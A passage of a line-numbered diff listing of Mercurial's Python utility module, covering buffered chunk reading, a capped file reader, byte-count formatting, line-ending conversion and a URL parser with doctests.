2624 if l is None:
2625 if l is None:
2625 return b''.join(self.iter)
2626 return b''.join(self.iter)
2626
2627
2627 left = l
2628 left = l
2628 buf = []
2629 buf = []
2629 queue = self._queue
2630 queue = self._queue
2630 while left > 0:
2631 while left > 0:
2631 # refill the queue
2632 # refill the queue
2632 if not queue:
2633 if not queue:
2633 target = 2 ** 18
2634 target = 2 ** 18
2634 for chunk in self.iter:
2635 for chunk in self.iter:
2635 queue.append(chunk)
2636 queue.append(chunk)
2636 target -= len(chunk)
2637 target -= len(chunk)
2637 if target <= 0:
2638 if target <= 0:
2638 break
2639 break
2639 if not queue:
2640 if not queue:
2640 break
2641 break
2641
2642
2642 # The easy way to do this would be to queue.popleft(), modify the
2643 # The easy way to do this would be to queue.popleft(), modify the
2643 # chunk (if necessary), then queue.appendleft(). However, for cases
2644 # chunk (if necessary), then queue.appendleft(). However, for cases
2644 # where we read partial chunk content, this incurs 2 dequeue
2645 # where we read partial chunk content, this incurs 2 dequeue
2645 # mutations and creates a new str for the remaining chunk in the
2646 # mutations and creates a new str for the remaining chunk in the
2646 # queue. Our code below avoids this overhead.
2647 # queue. Our code below avoids this overhead.
2647
2648
2648 chunk = queue[0]
2649 chunk = queue[0]
2649 chunkl = len(chunk)
2650 chunkl = len(chunk)
2650 offset = self._chunkoffset
2651 offset = self._chunkoffset
2651
2652
2652 # Use full chunk.
2653 # Use full chunk.
2653 if offset == 0 and left >= chunkl:
2654 if offset == 0 and left >= chunkl:
2654 left -= chunkl
2655 left -= chunkl
2655 queue.popleft()
2656 queue.popleft()
2656 buf.append(chunk)
2657 buf.append(chunk)
2657 # self._chunkoffset remains at 0.
2658 # self._chunkoffset remains at 0.
2658 continue
2659 continue
2659
2660
2660 chunkremaining = chunkl - offset
2661 chunkremaining = chunkl - offset
2661
2662
2662 # Use all of unconsumed part of chunk.
2663 # Use all of unconsumed part of chunk.
2663 if left >= chunkremaining:
2664 if left >= chunkremaining:
2664 left -= chunkremaining
2665 left -= chunkremaining
2665 queue.popleft()
2666 queue.popleft()
2666 # offset == 0 is enabled by block above, so this won't merely
2667 # offset == 0 is enabled by block above, so this won't merely
2667 # copy via ``chunk[0:]``.
2668 # copy via ``chunk[0:]``.
2668 buf.append(chunk[offset:])
2669 buf.append(chunk[offset:])
2669 self._chunkoffset = 0
2670 self._chunkoffset = 0
2670
2671
2671 # Partial chunk needed.
2672 # Partial chunk needed.
2672 else:
2673 else:
2673 buf.append(chunk[offset : offset + left])
2674 buf.append(chunk[offset : offset + left])
2674 self._chunkoffset += left
2675 self._chunkoffset += left
2675 left -= chunkremaining
2676 left -= chunkremaining
2676
2677
2677 return b''.join(buf)
2678 return b''.join(buf)
2678
2679
2679
2680
2680 def filechunkiter(f, size=131072, limit=None):
2681 def filechunkiter(f, size=131072, limit=None):
2681 """Create a generator that produces the data in the file size
2682 """Create a generator that produces the data in the file size
2682 (default 131072) bytes at a time, up to optional limit (default is
2683 (default 131072) bytes at a time, up to optional limit (default is
2683 to read all data). Chunks may be less than size bytes if the
2684 to read all data). Chunks may be less than size bytes if the
2684 chunk is the last chunk in the file, or the file is a socket or
2685 chunk is the last chunk in the file, or the file is a socket or
2685 some other type of file that sometimes reads less data than is
2686 some other type of file that sometimes reads less data than is
2686 requested."""
2687 requested."""
2687 assert size >= 0
2688 assert size >= 0
2688 assert limit is None or limit >= 0
2689 assert limit is None or limit >= 0
2689 while True:
2690 while True:
2690 if limit is None:
2691 if limit is None:
2691 nbytes = size
2692 nbytes = size
2692 else:
2693 else:
2693 nbytes = min(limit, size)
2694 nbytes = min(limit, size)
2694 s = nbytes and f.read(nbytes)
2695 s = nbytes and f.read(nbytes)
2695 if not s:
2696 if not s:
2696 break
2697 break
2697 if limit:
2698 if limit:
2698 limit -= len(s)
2699 limit -= len(s)
2699 yield s
2700 yield s
2700
2701
2701
2702
2702 class cappedreader(object):
2703 class cappedreader(object):
2703 """A file object proxy that allows reading up to N bytes.
2704 """A file object proxy that allows reading up to N bytes.
2704
2705
2705 Given a source file object, instances of this type allow reading up to
2706 Given a source file object, instances of this type allow reading up to
2706 N bytes from that source file object. Attempts to read past the allowed
2707 N bytes from that source file object. Attempts to read past the allowed
2707 limit are treated as EOF.
2708 limit are treated as EOF.
2708
2709
2709 It is assumed that I/O is not performed on the original file object
2710 It is assumed that I/O is not performed on the original file object
2710 in addition to I/O that is performed by this instance. If there is,
2711 in addition to I/O that is performed by this instance. If there is,
2711 state tracking will get out of sync and unexpected results will ensue.
2712 state tracking will get out of sync and unexpected results will ensue.
2712 """
2713 """
2713
2714
2714 def __init__(self, fh, limit):
2715 def __init__(self, fh, limit):
2715 """Allow reading up to <limit> bytes from <fh>."""
2716 """Allow reading up to <limit> bytes from <fh>."""
2716 self._fh = fh
2717 self._fh = fh
2717 self._left = limit
2718 self._left = limit
2718
2719
2719 def read(self, n=-1):
2720 def read(self, n=-1):
2720 if not self._left:
2721 if not self._left:
2721 return b''
2722 return b''
2722
2723
2723 if n < 0:
2724 if n < 0:
2724 n = self._left
2725 n = self._left
2725
2726
2726 data = self._fh.read(min(n, self._left))
2727 data = self._fh.read(min(n, self._left))
2727 self._left -= len(data)
2728 self._left -= len(data)
2728 assert self._left >= 0
2729 assert self._left >= 0
2729
2730
2730 return data
2731 return data
2731
2732
2732 def readinto(self, b):
2733 def readinto(self, b):
2733 res = self.read(len(b))
2734 res = self.read(len(b))
2734 if res is None:
2735 if res is None:
2735 return None
2736 return None
2736
2737
2737 b[0 : len(res)] = res
2738 b[0 : len(res)] = res
2738 return len(res)
2739 return len(res)
2739
2740
2740
2741
2741 def unitcountfn(*unittable):
2742 def unitcountfn(*unittable):
2742 '''return a function that renders a readable count of some quantity'''
2743 '''return a function that renders a readable count of some quantity'''
2743
2744
2744 def go(count):
2745 def go(count):
2745 for multiplier, divisor, format in unittable:
2746 for multiplier, divisor, format in unittable:
2746 if abs(count) >= divisor * multiplier:
2747 if abs(count) >= divisor * multiplier:
2747 return format % (count / float(divisor))
2748 return format % (count / float(divisor))
2748 return unittable[-1][2] % count
2749 return unittable[-1][2] % count
2749
2750
2750 return go
2751 return go
2751
2752
2752
2753
2753 def processlinerange(fromline, toline):
2754 def processlinerange(fromline, toline):
2754 """Check that linerange <fromline>:<toline> makes sense and return a
2755 """Check that linerange <fromline>:<toline> makes sense and return a
2755 0-based range.
2756 0-based range.
2756
2757
2757 >>> processlinerange(10, 20)
2758 >>> processlinerange(10, 20)
2758 (9, 20)
2759 (9, 20)
2759 >>> processlinerange(2, 1)
2760 >>> processlinerange(2, 1)
2760 Traceback (most recent call last):
2761 Traceback (most recent call last):
2761 ...
2762 ...
2762 ParseError: line range must be positive
2763 ParseError: line range must be positive
2763 >>> processlinerange(0, 5)
2764 >>> processlinerange(0, 5)
2764 Traceback (most recent call last):
2765 Traceback (most recent call last):
2765 ...
2766 ...
2766 ParseError: fromline must be strictly positive
2767 ParseError: fromline must be strictly positive
2767 """
2768 """
2768 if toline - fromline < 0:
2769 if toline - fromline < 0:
2769 raise error.ParseError(_(b"line range must be positive"))
2770 raise error.ParseError(_(b"line range must be positive"))
2770 if fromline < 1:
2771 if fromline < 1:
2771 raise error.ParseError(_(b"fromline must be strictly positive"))
2772 raise error.ParseError(_(b"fromline must be strictly positive"))
2772 return fromline - 1, toline
2773 return fromline - 1, toline
2773
2774
2774
2775
2775 bytecount = unitcountfn(
2776 bytecount = unitcountfn(
2776 (100, 1 << 30, _(b'%.0f GB')),
2777 (100, 1 << 30, _(b'%.0f GB')),
2777 (10, 1 << 30, _(b'%.1f GB')),
2778 (10, 1 << 30, _(b'%.1f GB')),
2778 (1, 1 << 30, _(b'%.2f GB')),
2779 (1, 1 << 30, _(b'%.2f GB')),
2779 (100, 1 << 20, _(b'%.0f MB')),
2780 (100, 1 << 20, _(b'%.0f MB')),
2780 (10, 1 << 20, _(b'%.1f MB')),
2781 (10, 1 << 20, _(b'%.1f MB')),
2781 (1, 1 << 20, _(b'%.2f MB')),
2782 (1, 1 << 20, _(b'%.2f MB')),
2782 (100, 1 << 10, _(b'%.0f KB')),
2783 (100, 1 << 10, _(b'%.0f KB')),
2783 (10, 1 << 10, _(b'%.1f KB')),
2784 (10, 1 << 10, _(b'%.1f KB')),
2784 (1, 1 << 10, _(b'%.2f KB')),
2785 (1, 1 << 10, _(b'%.2f KB')),
2785 (1, 1, _(b'%.0f bytes')),
2786 (1, 1, _(b'%.0f bytes')),
2786 )
2787 )
2787
2788
2788
2789
2789 class transformingwriter(object):
2790 class transformingwriter(object):
2790 """Writable file wrapper to transform data by function"""
2791 """Writable file wrapper to transform data by function"""
2791
2792
2792 def __init__(self, fp, encode):
2793 def __init__(self, fp, encode):
2793 self._fp = fp
2794 self._fp = fp
2794 self._encode = encode
2795 self._encode = encode
2795
2796
2796 def close(self):
2797 def close(self):
2797 self._fp.close()
2798 self._fp.close()
2798
2799
2799 def flush(self):
2800 def flush(self):
2800 self._fp.flush()
2801 self._fp.flush()
2801
2802
2802 def write(self, data):
2803 def write(self, data):
2803 return self._fp.write(self._encode(data))
2804 return self._fp.write(self._encode(data))
2804
2805
2805
2806
2806 # Matches a single EOL which can either be a CRLF where repeated CR
2807 # Matches a single EOL which can either be a CRLF where repeated CR
2807 # are removed or a LF. We do not care about old Macintosh files, so a
2808 # are removed or a LF. We do not care about old Macintosh files, so a
2808 # stray CR is an error.
2809 # stray CR is an error.
2809 _eolre = remod.compile(br'\r*\n')
2810 _eolre = remod.compile(br'\r*\n')
2810
2811
2811
2812
2812 def tolf(s):
2813 def tolf(s):
2813 return _eolre.sub(b'\n', s)
2814 return _eolre.sub(b'\n', s)
2814
2815
2815
2816
2816 def tocrlf(s):
2817 def tocrlf(s):
2817 return _eolre.sub(b'\r\n', s)
2818 return _eolre.sub(b'\r\n', s)
2818
2819
2819
2820
2820 def _crlfwriter(fp):
2821 def _crlfwriter(fp):
2821 return transformingwriter(fp, tocrlf)
2822 return transformingwriter(fp, tocrlf)
2822
2823
2823
2824
2824 if pycompat.oslinesep == b'\r\n':
2825 if pycompat.oslinesep == b'\r\n':
2825 tonativeeol = tocrlf
2826 tonativeeol = tocrlf
2826 fromnativeeol = tolf
2827 fromnativeeol = tolf
2827 nativeeolwriter = _crlfwriter
2828 nativeeolwriter = _crlfwriter
2828 else:
2829 else:
2829 tonativeeol = pycompat.identity
2830 tonativeeol = pycompat.identity
2830 fromnativeeol = pycompat.identity
2831 fromnativeeol = pycompat.identity
2831 nativeeolwriter = pycompat.identity
2832 nativeeolwriter = pycompat.identity
2832
2833
2833 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2834 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2834 3,
2835 3,
2835 0,
2836 0,
2836 ):
2837 ):
2837 # There is an issue in CPython that some IO methods do not handle EINTR
2838 # There is an issue in CPython that some IO methods do not handle EINTR
2838 # correctly. The following table shows what CPython version (and functions)
2839 # correctly. The following table shows what CPython version (and functions)
2839 # are affected (buggy: has the EINTR bug, okay: otherwise):
2840 # are affected (buggy: has the EINTR bug, okay: otherwise):
2840 #
2841 #
2841 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2842 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2842 # --------------------------------------------------
2843 # --------------------------------------------------
2843 # fp.__iter__ | buggy | buggy | okay
2844 # fp.__iter__ | buggy | buggy | okay
2844 # fp.read* | buggy | okay [1] | okay
2845 # fp.read* | buggy | okay [1] | okay
2845 #
2846 #
2846 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2847 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2847 #
2848 #
2848 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2849 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2849 # like "read*" work fine, as we do not support Python < 2.7.4.
2850 # like "read*" work fine, as we do not support Python < 2.7.4.
2850 #
2851 #
2851 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2852 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2852 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2853 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2853 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2854 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2854 # fp.__iter__ but not other fp.read* methods.
2855 # fp.__iter__ but not other fp.read* methods.
2855 #
2856 #
2856 # On modern systems like Linux, the "read" syscall cannot be interrupted
2857 # On modern systems like Linux, the "read" syscall cannot be interrupted
2857 # when reading "fast" files like on-disk files. So the EINTR issue only
2858 # when reading "fast" files like on-disk files. So the EINTR issue only
2858 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2859 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2859 # files approximately as "fast" files and use the fast (unsafe) code path,
2860 # files approximately as "fast" files and use the fast (unsafe) code path,
2860 # to minimize the performance impact.
2861 # to minimize the performance impact.
2861
2862
2862 def iterfile(fp):
2863 def iterfile(fp):
2863 fastpath = True
2864 fastpath = True
2864 if type(fp) is file:
2865 if type(fp) is file:
2865 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2866 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2866 if fastpath:
2867 if fastpath:
2867 return fp
2868 return fp
2868 else:
2869 else:
2869 # fp.readline deals with EINTR correctly, use it as a workaround.
2870 # fp.readline deals with EINTR correctly, use it as a workaround.
2870 return iter(fp.readline, b'')
2871 return iter(fp.readline, b'')
2871
2872
2872
2873
2873 else:
2874 else:
2874 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2875 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2875 def iterfile(fp):
2876 def iterfile(fp):
2876 return fp
2877 return fp
2877
2878
2878
2879
2879 def iterlines(iterator):
2880 def iterlines(iterator):
2880 for chunk in iterator:
2881 for chunk in iterator:
2881 for line in chunk.splitlines():
2882 for line in chunk.splitlines():
2882 yield line
2883 yield line
2883
2884
2884
2885
2885 def expandpath(path):
2886 def expandpath(path):
2886 return os.path.expanduser(os.path.expandvars(path))
2887 return os.path.expanduser(os.path.expandvars(path))
2887
2888
2888
2889
2889 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2890 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2890 """Return the result of interpolating items in the mapping into string s.
2891 """Return the result of interpolating items in the mapping into string s.
2891
2892
2892 prefix is a single character string, or a two character string with
2893 prefix is a single character string, or a two character string with
2893 a backslash as the first character if the prefix needs to be escaped in
2894 a backslash as the first character if the prefix needs to be escaped in
2894 a regular expression.
2895 a regular expression.
2895
2896
2896 fn is an optional function that will be applied to the replacement text
2897 fn is an optional function that will be applied to the replacement text
2897 just before replacement.
2898 just before replacement.
2898
2899
2899 escape_prefix is an optional flag that allows using doubled prefix for
2900 escape_prefix is an optional flag that allows using doubled prefix for
2900 its escaping.
2901 its escaping.
2901 """
2902 """
2902 fn = fn or (lambda s: s)
2903 fn = fn or (lambda s: s)
2903 patterns = b'|'.join(mapping.keys())
2904 patterns = b'|'.join(mapping.keys())
2904 if escape_prefix:
2905 if escape_prefix:
2905 patterns += b'|' + prefix
2906 patterns += b'|' + prefix
2906 if len(prefix) > 1:
2907 if len(prefix) > 1:
2907 prefix_char = prefix[1:]
2908 prefix_char = prefix[1:]
2908 else:
2909 else:
2909 prefix_char = prefix
2910 prefix_char = prefix
2910 mapping[prefix_char] = prefix_char
2911 mapping[prefix_char] = prefix_char
2911 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2912 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2912 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2913 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2913
2914
2914
2915
2915 def getport(port):
2916 def getport(port):
2916 """Return the port for a given network service.
2917 """Return the port for a given network service.
2917
2918
2918 If port is an integer, it's returned as is. If it's a string, it's
2919 If port is an integer, it's returned as is. If it's a string, it's
2919 looked up using socket.getservbyname(). If there's no matching
2920 looked up using socket.getservbyname(). If there's no matching
2920 service, error.Abort is raised.
2921 service, error.Abort is raised.
2921 """
2922 """
2922 try:
2923 try:
2923 return int(port)
2924 return int(port)
2924 except ValueError:
2925 except ValueError:
2925 pass
2926 pass
2926
2927
2927 try:
2928 try:
2928 return socket.getservbyname(pycompat.sysstr(port))
2929 return socket.getservbyname(pycompat.sysstr(port))
2929 except socket.error:
2930 except socket.error:
2930 raise error.Abort(
2931 raise error.Abort(
2931 _(b"no port number associated with service '%s'") % port
2932 _(b"no port number associated with service '%s'") % port
2932 )
2933 )
2933
2934
2934
2935
2935 class url(object):
2936 class url(object):
2936 r"""Reliable URL parser.
2937 r"""Reliable URL parser.
2937
2938
2938 This parses URLs and provides attributes for the following
2939 This parses URLs and provides attributes for the following
2939 components:
2940 components:
2940
2941
2941 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2942 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2942
2943
2943 Missing components are set to None. The only exception is
2944 Missing components are set to None. The only exception is
2944 fragment, which is set to '' if present but empty.
2945 fragment, which is set to '' if present but empty.
2945
2946
2946 If parsefragment is False, fragment is included in query. If
2947 If parsefragment is False, fragment is included in query. If
2947 parsequery is False, query is included in path. If both are
2948 parsequery is False, query is included in path. If both are
2948 False, both fragment and query are included in path.
2949 False, both fragment and query are included in path.
2949
2950
2950 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2951 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2951
2952
2952 Note that for backward compatibility reasons, bundle URLs do not
2953 Note that for backward compatibility reasons, bundle URLs do not
2953 take host names. That means 'bundle://../' has a path of '../'.
2954 take host names. That means 'bundle://../' has a path of '../'.
2954
2955
2955 Examples:
2956 Examples:
2956
2957
2957 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2958 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2958 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2959 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2959 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2960 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2960 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2961 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2961 >>> url(b'file:///home/joe/repo')
2962 >>> url(b'file:///home/joe/repo')
2962 <url scheme: 'file', path: '/home/joe/repo'>
2963 <url scheme: 'file', path: '/home/joe/repo'>
2963 >>> url(b'file:///c:/temp/foo/')
2964 >>> url(b'file:///c:/temp/foo/')
2964 <url scheme: 'file', path: 'c:/temp/foo/'>
2965 <url scheme: 'file', path: 'c:/temp/foo/'>
2965 >>> url(b'bundle:foo')
2966 >>> url(b'bundle:foo')
2966 <url scheme: 'bundle', path: 'foo'>
2967 <url scheme: 'bundle', path: 'foo'>
2967 >>> url(b'bundle://../foo')
2968 >>> url(b'bundle://../foo')
2968 <url scheme: 'bundle', path: '../foo'>
2969 <url scheme: 'bundle', path: '../foo'>
2969 >>> url(br'c:\foo\bar')
2970 >>> url(br'c:\foo\bar')
2970 <url path: 'c:\\foo\\bar'>
2971 <url path: 'c:\\foo\\bar'>
2971 >>> url(br'\\blah\blah\blah')
2972 >>> url(br'\\blah\blah\blah')
2972 <url path: '\\\\blah\\blah\\blah'>
2973 <url path: '\\\\blah\\blah\\blah'>
2973 >>> url(br'\\blah\blah\blah#baz')
2974 >>> url(br'\\blah\blah\blah#baz')
2974 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2975 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2975 >>> url(br'file:///C:\users\me')
2976 >>> url(br'file:///C:\users\me')
2976 <url scheme: 'file', path: 'C:\\users\\me'>
2977 <url scheme: 'file', path: 'C:\\users\\me'>
2977
2978
2978 Authentication credentials:
2979 Authentication credentials:
2979
2980
2980 >>> url(b'ssh://joe:xyz@x/repo')
2981 >>> url(b'ssh://joe:xyz@x/repo')
2981 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2982 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2982 >>> url(b'ssh://joe@x/repo')
2983 >>> url(b'ssh://joe@x/repo')
2983 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2984 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2984
2985
2985 Query strings and fragments:
2986 Query strings and fragments:
2986
2987
2987 >>> url(b'http://host/a?b#c')
2988 >>> url(b'http://host/a?b#c')
2988 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2989 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2989 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2990 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2990 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2991 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2991
2992
2992 Empty path:
2993 Empty path:
2993
2994
2994 >>> url(b'')
2995 >>> url(b'')
2995 <url path: ''>
2996 <url path: ''>
2996 >>> url(b'#a')
2997 >>> url(b'#a')
2997 <url path: '', fragment: 'a'>
2998 <url path: '', fragment: 'a'>
2998 >>> url(b'http://host/')
2999 >>> url(b'http://host/')
2999 <url scheme: 'http', host: 'host', path: ''>
3000 <url scheme: 'http', host: 'host', path: ''>
3000 >>> url(b'http://host/#a')
3001 >>> url(b'http://host/#a')
3001 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3002 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3002
3003
3003 Only scheme:
3004 Only scheme:
3004
3005
3005 >>> url(b'http:')
3006 >>> url(b'http:')
3006 <url scheme: 'http'>
3007 <url scheme: 'http'>
3007 """
3008 """
3008
3009
3009 _safechars = b"!~*'()+"
3010 _safechars = b"!~*'()+"
3010 _safepchars = b"/!~*'()+:\\"
3011 _safepchars = b"/!~*'()+:\\"
3011 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3012 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3012
3013
3013 def __init__(self, path, parsequery=True, parsefragment=True):
3014 def __init__(self, path, parsequery=True, parsefragment=True):
3014 # We slowly chomp away at path until we have only the path left
3015 # We slowly chomp away at path until we have only the path left
3015 self.scheme = self.user = self.passwd = self.host = None
3016 self.scheme = self.user = self.passwd = self.host = None
3016 self.port = self.path = self.query = self.fragment = None
3017 self.port = self.path = self.query = self.fragment = None
3017 self._localpath = True
3018 self._localpath = True
3018 self._hostport = b''
3019 self._hostport = b''
3019 self._origpath = path
3020 self._origpath = path
3020
3021
3021 if parsefragment and b'#' in path:
3022 if parsefragment and b'#' in path:
3022 path, self.fragment = path.split(b'#', 1)
3023 path, self.fragment = path.split(b'#', 1)
3023
3024
3024 # special case for Windows drive letters and UNC paths
3025 # special case for Windows drive letters and UNC paths
3025 if hasdriveletter(path) or path.startswith(b'\\\\'):
3026 if hasdriveletter(path) or path.startswith(b'\\\\'):
3026 self.path = path
3027 self.path = path
3027 return
3028 return
3028
3029
3029 # For compatibility reasons, we can't handle bundle paths as
3030 # For compatibility reasons, we can't handle bundle paths as
3030 # normal URLS
3031 # normal URLS
3031 if path.startswith(b'bundle:'):
3032 if path.startswith(b'bundle:'):
3032 self.scheme = b'bundle'
3033 self.scheme = b'bundle'
3033 path = path[7:]
3034 path = path[7:]
3034 if path.startswith(b'//'):
3035 if path.startswith(b'//'):
3035 path = path[2:]
3036 path = path[2:]
3036 self.path = path
3037 self.path = path
3037 return
3038 return
3038
3039
3039 if self._matchscheme(path):
3040 if self._matchscheme(path):
3040 parts = path.split(b':', 1)
3041 parts = path.split(b':', 1)
3041 if parts[0]:
3042 if parts[0]:
3042 self.scheme, path = parts
3043 self.scheme, path = parts
3043 self._localpath = False
3044 self._localpath = False
3044
3045
3045 if not path:
3046 if not path:
3046 path = None
3047 path = None
3047 if self._localpath:
3048 if self._localpath:
3048 self.path = b''
3049 self.path = b''
3049 return
3050 return
3050 else:
3051 else:
3051 if self._localpath:
3052 if self._localpath:
3052 self.path = path
3053 self.path = path
3053 return
3054 return
3054
3055
3055 if parsequery and b'?' in path:
3056 if parsequery and b'?' in path:
3056 path, self.query = path.split(b'?', 1)
3057 path, self.query = path.split(b'?', 1)
3057 if not path:
3058 if not path:
3058 path = None
3059 path = None
3059 if not self.query:
3060 if not self.query:
3060 self.query = None
3061 self.query = None
3061
3062
3062 # // is required to specify a host/authority
3063 # // is required to specify a host/authority
3063 if path and path.startswith(b'//'):
3064 if path and path.startswith(b'//'):
3064 parts = path[2:].split(b'/', 1)
3065 parts = path[2:].split(b'/', 1)
3065 if len(parts) > 1:
3066 if len(parts) > 1:
3066 self.host, path = parts
3067 self.host, path = parts
3067 else:
3068 else:
3068 self.host = parts[0]
3069 self.host = parts[0]
3069 path = None
3070 path = None
3070 if not self.host:
3071 if not self.host:
3071 self.host = None
3072 self.host = None
3072 # path of file:///d is /d
3073 # path of file:///d is /d
3073 # path of file:///d:/ is d:/, not /d:/
3074 # path of file:///d:/ is d:/, not /d:/
3074 if path and not hasdriveletter(path):
3075 if path and not hasdriveletter(path):
3075 path = b'/' + path
3076 path = b'/' + path
3076
3077
3077 if self.host and b'@' in self.host:
3078 if self.host and b'@' in self.host:
3078 self.user, self.host = self.host.rsplit(b'@', 1)
3079 self.user, self.host = self.host.rsplit(b'@', 1)
3079 if b':' in self.user:
3080 if b':' in self.user:
3080 self.user, self.passwd = self.user.split(b':', 1)
3081 self.user, self.passwd = self.user.split(b':', 1)
3081 if not self.host:
3082 if not self.host:
3082 self.host = None
3083 self.host = None
3083
3084
3084 # Don't split on colons in IPv6 addresses without ports
3085 # Don't split on colons in IPv6 addresses without ports
3085 if (
3086 if (
3086 self.host
3087 self.host
3087 and b':' in self.host
3088 and b':' in self.host
3088 and not (
3089 and not (
3089 self.host.startswith(b'[') and self.host.endswith(b']')
3090 self.host.startswith(b'[') and self.host.endswith(b']')
3090 )
3091 )
3091 ):
3092 ):
3092 self._hostport = self.host
3093 self._hostport = self.host
3093 self.host, self.port = self.host.rsplit(b':', 1)
3094 self.host, self.port = self.host.rsplit(b':', 1)
3094 if not self.host:
3095 if not self.host:
3095 self.host = None
3096 self.host = None
3096
3097
3097 if (
3098 if (
3098 self.host
3099 self.host
3099 and self.scheme == b'file'
3100 and self.scheme == b'file'
3100 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3101 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3101 ):
3102 ):
3102 raise error.Abort(
3103 raise error.Abort(
3103 _(b'file:// URLs can only refer to localhost')
3104 _(b'file:// URLs can only refer to localhost')
3104 )
3105 )
3105
3106
3106 self.path = path
3107 self.path = path
3107
3108
3108 # leave the query string escaped
3109 # leave the query string escaped
3109 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3110 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3110 v = getattr(self, a)
3111 v = getattr(self, a)
3111 if v is not None:
3112 if v is not None:
3112 setattr(self, a, urlreq.unquote(v))
3113 setattr(self, a, urlreq.unquote(v))
3113
3114
3114 @encoding.strmethod
3115 @encoding.strmethod
3115 def __repr__(self):
3116 def __repr__(self):
3116 attrs = []
3117 attrs = []
3117 for a in (
3118 for a in (
3118 b'scheme',
3119 b'scheme',
3119 b'user',
3120 b'user',
3120 b'passwd',
3121 b'passwd',
3121 b'host',
3122 b'host',
3122 b'port',
3123 b'port',
3123 b'path',
3124 b'path',
3124 b'query',
3125 b'query',
3125 b'fragment',
3126 b'fragment',
3126 ):
3127 ):
3127 v = getattr(self, a)
3128 v = getattr(self, a)
3128 if v is not None:
3129 if v is not None:
3129 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3130 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3130 return b'<url %s>' % b', '.join(attrs)
3131 return b'<url %s>' % b', '.join(attrs)
3131
3132
3132 def __bytes__(self):
3133 def __bytes__(self):
3133 r"""Join the URL's components back into a URL string.
3134 r"""Join the URL's components back into a URL string.
3134
3135
3135 Examples:
3136 Examples:
3136
3137
3137 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3138 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3138 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3139 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3139 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3140 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3140 'http://user:pw@host:80/?foo=bar&baz=42'
3141 'http://user:pw@host:80/?foo=bar&baz=42'
3141 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3142 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3142 'http://user:pw@host:80/?foo=bar%3dbaz'
3143 'http://user:pw@host:80/?foo=bar%3dbaz'
3143 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3144 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3144 'ssh://user:pw@[::1]:2200//home/joe#'
3145 'ssh://user:pw@[::1]:2200//home/joe#'
3145 >>> bytes(url(b'http://localhost:80//'))
3146 >>> bytes(url(b'http://localhost:80//'))
